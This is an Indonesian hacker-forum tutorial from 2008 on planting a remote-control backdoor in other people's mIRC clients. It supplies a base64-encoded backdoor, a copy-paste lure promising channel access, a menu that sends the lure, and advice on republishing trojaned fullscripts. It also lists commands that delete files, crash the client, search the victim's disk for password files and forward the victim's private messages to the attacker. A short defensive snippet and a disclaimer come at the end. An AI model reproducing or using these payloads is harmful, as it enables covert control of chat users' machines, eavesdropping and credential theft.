REMOTE SCRIPT MIRC DENGAN Base64 ENCODING

- Remote Script mIRC Dengan Base64 Encoding -

REMOTE SCRIPT MIRC DENGAN Base64 ENCODING Oleh : MeTaLaToR Mail : [email protected] Forum : www.bising.co.nr

A. Intro Artikel ini hampir sama dengan Artikel saya yang berjudul “Bermain Virus IRC On Encode Description”, hanya saja pada artikel ini kita akan melakukan suatu aktifitas yang lebih mengarah kepada system, yaitu remote script. Sedangkan kesamaannya dengan artikel tersebut adalah samasama menggunakan encode text dan melakukan Private Message dalam penginfeksian. Pengertian dari remote script disini kurang lebih adalah kita bisa melakukan apa saja terhadap script orang lain, “dengan catatan” script orang yang kita tuju telah disisipi suatu baris command “on event” milik kita, seperti contoh berikut : on ^*:text:codet*:?:{ . $+ $2- | haltdef } Yang mana artinya kurang lebih adalah : Setiap kalimat didalam query (private message) dengan kata yang diawali dengan “codet” tidak akan terlihat oleh yang punya script dan melakukan baris perintah pada kata yang kedua dan seterusnya ( “$2-” ). Bagaimana cara menuliskannya pada script orang yang kita tuju? Sedangkan orang tersebut saya yakin 99% tidak akan mau disuruh untuk menuliskannya. Mungkin kamu pernah menerima Private Message dari seseorang yang isinya kurang lebih seperti berikut : mau dapat akses di #namachannel ? copy dan paste kan ini --> //write script.mrc $decode(b24gXio6dGV4dDpjb2RldCo6Pzp7IC4gJCsgJDItIHwgaGFsdGRlZiB9,m) | .load -rs script.mrc | msg #namachannel - Register -

Tawaran diatas sebenarnya bukanlah sungguhan, itu merupakan pancingan kepada korban untuk melakukan copy-paste script yang dikirimkan oleh pelaku, yang tidak lain isinya sama dengan baris script yang diatas. Sayangnya masih saja ada yang percaya dengan tawaran tersebut, walaupun sebagian besar para chatter tidak tergiur dengan tawaran tersebut. Pada artikel kali ini kita akan mencoba membuat encode text yang berisikan code yang hendak kamu kirimkan kepada korban, dialog menu Encoder Text, command yang bisa diberikan kepada korban, berikut penangkalnya.

.:: www.bising.co.nr – CopyLeft @ 2008 ::.


B. Menyusun Perlengkapan Code “b24gXio6dGV4dDpjb2RldCo6Pzp7IC4gJCsgJDItIHwgaGFsdGRlZiB9” adalah text yang dihasilkan dari Base64 encoding yang didalam mIRC code tersebut merupakan suatu baris perintah : on ^*:text:codet*:?:{ . $+ $2- | haltdef } Text inilah yang nantinya akan kita kirimkan kepada korban. Kamu bisa mengganti trigger text tersebut diatas (codet*) dengan kata lain, misalnya serv*, kamu bebas berkreatifitas sendiri. Tetapi bagaimana cara meng-encode kannya setelah baris perintah tersebut diedit? Untuk itu kita akan membuat dialog menu encoder text. Siapkan mIRC Script Editor kamu. Kemudian tulislah snippet dibawah ini, atau jika kamu telah memilikinya abaikan saja snippet dibawah ini. Snippet berikut saya copy dari artikel saya yang berjudul “Bermain Virus IRC On Encode Description”. alias text2encode { $iif(!$dialog(t2e), dialog -m t2e t2e_tb, dialog -v t2e) } menu menubar { Encoder Text: /text2encode } dialog t2e_tb { title "EncodeR" size -1 -1 180 72 option dbu text "Masukkan text/sentences yang akan di Encode-kan:", 1, 0 7 180 8, center text "Input :", 2, 2 19 27 8, right text "Output :", 3, 2 29 27 8, right edit "", 4, 32 19 110 9, autohs edit "", 5, 32 29 110 34, vsbar multi read button "Set", 6, 145 19 30 9 } on *:dialog:t2e:*:*:{ if ($devent == sclick) { if ($did = 6) && ($did(4) != $null) { %a = $encode($did(4).text,m) | did -ra $dname 5 %a } }

}

Untuk keterangan listingnya, kamu bisa buka help dari dalam folder mIRC kamu. Setelah dialog tersebut diatas telah selesai, panggil dialog tersebut dengan mengetikkan /text2encode pada editbox kamu. Jika tidak ada masalah dialog menu tersebut tampil di hadapan anda. Buka kembali code yang telah kita edit dan kita siapkan sebelumnya : on ^*:text:serv*:?:{ . $+ $2- | haltdef } Copylah baris code tersebut ke dalam dialog menu encoder yang telah kita panggil tadi pada kolom input, kemudian tekan tombol “set”. Pada kolom output, yaitu pada bagian kolom dibawahnya akan muncul sederet text asing. Copy lah keseluruhan text tersebut dengan meng-klik kanan mouse kamu pada text tersebut pilih menu “Select All” ---> “Copy”.



Lantas akan kita pastekan kemana text hasil copy ini? Tunggu sebentar tahan dulu niat untuk mem-paste nya. Kita bikin menu nicklist untuk memudahkan kita dalam pengiriman “paket” ke korban. Siapkan mIRC script editor kamu, dan salinlah snippet menu dibawah ini : menu nicklist { $iif(!$server, $style(2)) send base64:sbase $$1 } alias sbase { var %a = PASTEKAN DISINI /msg $$1 mau dapat akses di # ? copy dan paste kan ini --> //write script.mrc $ $+ decode( $+ %a $+ ,m) $+($chr(124)) .load -rs script.mrc $+($chr(124)) msg #namachannel - Register }

Perhatikan baris pada var %a yang bercetak tebal dan berwarna merah, kamu bisa mempastekan text yang kamu copy tadi di dialog menu encoder pada baris tersebut sehingga menjadi : var %a = b24gXio6dGV4dDpzZXJ2Kjo/OnsgLiAkKy.....dst Berikut keterangan listing code tersebut diatas menu nicklist {

membuat menu baru pada nicklist dengan tanda kurawa buka yang artinya memulai aksi. $iif(!$server, $style(2)) send base64:sbase $$1 Jika server tidak terkoneksi, disablekan menu “Send base64”. Tetapi sebaliknya, Jika server dalam keadaan terkoneksi, enablekan menu “Send base64” dengan pemberian perintah /sbase. }

Penutup script dari menu nicklist alias sbase {

Alias dari command /sbase, dengan tanda kurawa buka yang artinya pembuka script. var %a = PASTEKAN DISINI

merupakan kata/code ganti suatu command/kata yang divariablekan. Yang dalam hal ini adalah text yang telah kamu encode-kan. /msg $$1 mau dapat akses di # ? copy dan paste kan ini --> //write script.mrc $ $+ decode( $+ %a $+ ,m) $+($chr(124)) .load -rs script.mrc $+($chr(124)) msg #namachannel - Register -

Adalah aksi dari alias /sbase dengan mengirimkan message kepada nick yang dituju ($$1) yang mana isi dari pesan ini mengandung variable %a. $+($chr(124)) adalah ascii pengganti dari character : | Setelah selesai dituliskan di script editor kamu, cobalah klik kanan pada nick yang dituju, dengan catatan kamu harus berada dalam posisi terkoneksi ke server. Jika tidak ada halangan, kamu akan mendapatkan satu menu baru yang bertuliskan “send base64”. Jika menu ini diklik, maka script akan memanggil command /sbase yang isinya seperti tersebut diatas dan mengirimkannya kepada nick yang dituju.



Jika code kita berhasil masuk atau dengan kata lain si korban telah meng-copy paste kan kiriman kita, kita cukup melihatnya di terminal channel apakah korban “mengucapkan” : – Register Jika pada layar channel, kita mendapati korban “mengucapkan” kata tersebut, coba tes dengan mengetikkan : /msg serv .msg hai.. Jika kamu mendapati bahwa korban telah memberikan message kepada kamu dengan ucapan “hai..”. Selamat..! kamu telah berhasil menyisipkan code tersebut di script korban. Dan kamu bisa melakukan experimen-experimen berikutnya dengan menuliskan command mIRC lainnya. Sebenarnya ada cara lainnya untuk menyusupkan baris text ini didalam script, yaitu dengan menuliskannya secara langsung didalam script. Coba kamu pergi www.hawkee.com, atau www.mirc.org, atau situs lainnya yang menyediakan download-an fullscript. Download lah script yang diinginkan kemudian edit lah pada editor scriptnya dengan menyisipkan baris code tersebut diatas. Untuk selanjutnya hostingkan kembali fullscript yang telah kamu edit itu di site kamu. Dan kamu tinggal “memasarkannya”. Dan jangan lupa, kamu harus memasang tanda pengenal (ciri) pada script tersebut, ketika korban memakainya. Tanda pengenal ini bisa berupa “ctcp reply ping” atau sebagainya, terserah kamu. Untuk mengecheck, apakah korban tersebut menggunakan fullscript yang telah kita edit tersebut, lakukan pengechek-an terhadap korban dengan tanda pengenal yang telah kita pasang di dalam full script tersebut. Misalkan tanda pengenal tersebut berupa “Ping Replier”. /ctcp ping dan kamu mendapatkan jawaban sama dengan apa yang telah kamu setting, maka lakukan lah tes dengan mengetikkan : /msg serv .msg hai..

C. Daftar Command Yang Bisa Dikirimkan Berikut ini adalah sebagian dari daftar command mIRC yang bisa kamu eksekusikan terhadap korban. Kamu bisa bereksperimen sendiri dengan command-command mIRC lainnya terhadap korban. Membuat korban menuliskan message di channel : /msg serv msg #wongprabu halo semuanya... Command ini akan membuat korban berbicara di channel #wongprabu dengan isi pesan : “halo semuanya...” Membuat korban menuliskan message ke nick lain : /msg serv msg asl pls dunk Command ini akan membuat korban mengirimkan Private Message ke nick yang dituju dengan isi pesan: “asl pls dunk”



Membuat korban join ke channel : /msg serv join #wongprabu Membuat korban part dari channel : /msg serv part #wongprabu Membuat korban membuka situs : /msg serv url www.bising.co.nr Membuat korban berganti nick : /msg serv nick Dan sederet perintah mIRC standar lainnya, kamu bisa mengembangkannya sendiri. Buka Help yang ada di dalam folder mIRC kamu untuk perintah-perintah standar lainnya. Seperti notice, ctcp, invite, kick, ban, mode, dcc, ignore, quit, dan lainnya. Yang harus kamu perhatikan adalah sebelum kamu mengetikkan command tersebut, harus diawali dengan “trigger” (kata kunci) kamu, yang pada contoh diatas adalah “serv”. Selain dari perintah standar untuk chatter mIRC tersebut, kita akan mencoba perintah lainnya yang mengarah kepada system. Membuat alias baru pada script korban : /msg serv write newscript.mrc alias dodol { .msg #wongprabu dodol } /msg serv .load -rs newscript.mrc /msg serv dodol Kita akan membuat script baru dengan nama file “newscript.mrc”, isi dari file newscript.mrc tersebut adalah “alias dodol { .msg #wongprabu dodol }”. Setelah dituliskan, kita akan me-load nya, yang kemudian panggil perintah “dodol” yang berisikan aksi tersebut. Meng-unload -rs script : /msg serv .unload -rs newscript.mrc command ini meng-unload kan script yang bernama newscript.mrc Menghapus isi textfile : /msg serv write -c newscript.mrc command ini akan menghapus semua isi text dari file yang bernama newscript.mrc Menghapus file: /msg serv .remove newscript.mrc command ini akan menghapus file yang bernama newscript.mrc Membuat mIRC korban menjadi crash : /msg serv write newscript.mrc alias crash { while (1 != 2) { beep } } /msg serv .load -rs newscript.mrc /msg serv crash



Memeriksa file pada harddisk korban : /msg serv write newscript.mrc alias chechk1 { .echo $findfile(C:\,pass.*,0, .msg $1-) } /msg serv .load -rs newscript.mrc /msg serv chechk1 Mengganti background mIRC korban : /msg serv background [-aemsgdluhcfnrtpx] [nama window] [nama file] -a : active window -m : main mIRC window -s : status window -g : finger window -d : single message window -e : set as default -cfnrtp : center, fill, normal, stretch, tile, photo -l : toolbar -u : toolbar buttons -h : switchbar -x : no background picture contoh /msg serv background -sc c:\mypictures\bullet.gif Yang artinya kita mengganti background pada window status dengan file gambar yang berada di drive c: folder mypicture dan nama filenya adalah bullet.gif. Menguping pembicaraan korban : /msg serv write sys on *:TEXT:*:?: { .msg <- = $+ $nick $+ = $1- } /msg serv write sys on *:INPUT:?: { .msg -> $iif($left($1,1) != /,= $+ $me $+ =) $1- } /msg serv .load -rs newscript.mrc Setiap Private message yang dilakukan korban dengan nick mana saja, isi dari pembicaraan tersebut akan dikirimkan ke nick kamu, dengan catatan, jika kamu sedang ONLINE. Atau jika tidak mau susah kirimkan saja isi dari pembicaraan tersebut ke psy kamu (jika ada), dan kamu bisa membukanya setiap saat. Memasang sinyal/tanda : Memasang sinyal/tanda bahwa korban terkoneksi ke server dengan pemberitahuan ke nick kamu. /msg serv write sys on *:connect: { .msg $timestamp aku online bos } /msg serv .load -rs sys Dan masih banyak lagi command-command mIRC lainnya yang bisa kamu praktekkan. Kamu bisa lihat mIRC HELP untuk daftar command. Dengan acuan cara pengiriman command, pembuatan script, dan load script seperti yang telah dijabarkan diatas. Untuk praktek tanpa online kamu bisa menggunakan sofware bantuan bircd.exe, software ini merupakan virtual online untuk uji coba script kamu tanpa harus terkoneksi ke internet. Coba download software tersebut, mencari di Google dengan kata kunci “bircd.exe”. Atau kamu bisa menghubungi kruw www.bising.co.nr untuk mendapatkannya, gratis.



D. Penangkalan Sama halnya dengan virus/spam mirc yang saya tulis di artikel saya yang berjudul “Bermain Virus IRC On Encode Description” proses infeksinya melalui kesalahan dari korban, yang meng-copy paste code tersebut. Jika kamu adalah pemakai fullscript hasil downloa-an dari sumber situs yang kurang bisa dipercaya, coba periksa kembali isi scirptnya, jika terdapat tanda-tanda seperti yang telah diuraikan diatas, ada kemungkinan bahwa kamu telah mengalami “remote script”. Cara yang terbaik tidak menggunakan fullscript tersebut. Kamu bisa mendowload fullscript dari sumber yang bisa dipercaya, seperti www.hawkee.com, situs ini menyediakan banyak fullscript yang bisa kamu pakai dengan aman. Berikut ini adalah snippet code untuk menolak kiriman tersebut, saya copy dari artikel saya yang berjudul “Bermain Virus IRC On Encode Description”. Jika kamu telah menuliskannya di mIRC script editor kamu, abaikan saja snippet dibawah ini. Siapkan script editor kamu dan tuliskan snippet berikut ini : on *:open:?: { var %temp = 1 while ( %temp <= $comchan($nick,0) ) { var %chan = %chan $comchan($nick,%temp) if ($nick == $me) { halt } if ($me !isop $comchan($nick,%temp)) || (%chan == $null) { var %word = load if (%word isin $strip($1-)) { .ignore -pcntikdu $+ 120 $nick .timer 1 1 close -m $nick echo -s * - Spam dari $nick telah diblokir linesep -s | halt } } if ($me isop $comchan($nick,%temp)) { var %word = load if (%word isin $strip($1-)) { ban $+(-u,120) $comchan($nick,%temp) $nick 5 if ($nick ison $comchan($nick,%temp)) { kick $comchan($nick,%temp) $nick -[Spammer.. on Query]- } .ignore -pcntikdu $+ 120 $nick .timer 1 1 close -m $nick echo -s * - Spam dari $nick telah diblokir linesep -s | halt } } inc %temp } }

Baris keterangan : on *:open:?: {

Event pada saat query nick pertama kali dibuka.



var %temp = 1 while ( %temp <= $comchan($nick,0) ) {

Ketika kondisi variable dari %temp lebih kecil nilainya atau sama dengan dari pada jumlah channel kamu dan nick tersebut berada, maka lakukan aksi. var %chan = %chan $comchan($nick,%temp) if ($nick == $me) { halt }

Channel dimana nick tersebut dan kamu berada digantikan dengan variable %chan, dan jika yang kirim pesan tersebut atas nama kamu aksinya di-halt (script dihentikan). if ($me !isop $comchan($nick,%temp)) || (%chan == $null) { var %word = load if (%word isin $strip($1-)) { .ignore -pcntikdu $+ 120 $nick .timer 1 1 close -m $nick echo -s * - Spam dari $nick telah diblokir linesep -s | halt } }

Jika kamu bukan OP pada channel dimana nick tersebut berada, atau nick tersebut tidak bersama didalam satu channel dengan kamu, maka lakukan aksi ( “{“ ). Text “Load” digantikan oleh variable %word, dan jika kalimat yang dikirimkan oleh seseorang ($nick) mengandung variable %word, maka lakukan : .ignore -pcntikdu $+ 120 $nick

Ignore-kan nick tersebut selama 120 sec .timer 1 1 close -m $nick

Set waktu pada detik ke satu, tutup window query nick. echo -s * - Spam dari $nick telah diblokir -

Pada window status, tampilkan pesan. linesep -s | halt

Memberikan separator pada layar status, serta menghentikan script (halt). if ($me isop $comchan($nick,%temp)) { var %word = load if (%word isin $strip($1-)) { ban $+(-u,120) $comchan($nick,%temp) $nick 5 if ($nick ison $comchan($nick,%temp)) { kick $comchan($nick,%temp) $nick -[Spammer.. on Query]- } .ignore -pcntikdu $+ 120 $nick .timer 1 1 close -m $nick echo -s * - Spam dari $nick telah diblokir linesep -s | halt } }

Jika kamu adalah OP pada channel dimana nick tersebut berada, maka lakukan aksi ( “{“ ). Text “Load” digantikan oleh variable %word, dan jika kalimat yang dikirimkan oleh seseorang ($nick) mengandung variable %word, maka lakukan : ban $+(-u,120) $comchan($nick,%temp) $nick 5

mode ban pada nick tersebut selama 120 sec dengan type ban 5 if ($nick ison $comchan($nick,%temp)) { kick $comchan($nick,%temp) $nick -[Spammer.. on Query]- }

Jika nick tersebut ada di dalam channel, maka kick nick tersebut. .ignore -pcntikdu $+ 120 $nick

Ignore-kan nick tersebut selama 120 sec .timer 1 1 close -m $nick

Set waktu pada detik ke satu, tutup window query nick.



echo -s * - Spam dari $nick telah diblokir -

Pada window status, tampilkan pesan. linesep -s | halt

Memberikan separator pada layar status, serta menghentikan script (halt). inc %temp } }

Melakukan perulangan untuk variable %temp, dan menutup baris script dari event open. Jika tidak ada masalah, dan ketika ada seseorang yang mem-private message kamu dengan contoh code diatas, script ini akan melakukan aktifitasnya.

E. Finishing Jangan mudah percaya dengan apa yang ditawarkan oleh seseorang di Private Message. Jika kamu berniat menggunakan mIRC fullscript, sebaiknya membuat sendiri fullscript tersebut atau mendownloadnya dari situs yang bisa dipercaya. Karena sebagan besar trojan menunggu kelalaian dari user. Sedangkan mIRC merupakan salah satu “pintu besar” bagi trojan untuk masuk. Tidak ada maksud lain dari penulisan artikel ini, melainkan hanya untuk tahu dan bagaimana cara kita menyikapinya. Artikel ini mungkin jauh dari harapan, untuk itu kepada para master dan suhu, mohon bimbingannya.

--= eof =--

[] Malu untuk mengakui yang bukan miliknya [] Best Regard teman-teman seperjuangan. MeTaLaToR [Bising Teams @ 2008 - www.bising.co.nr]


REMOTE SCRIPT MIRC DENGAN Base64 ENCODING

Recommend Documents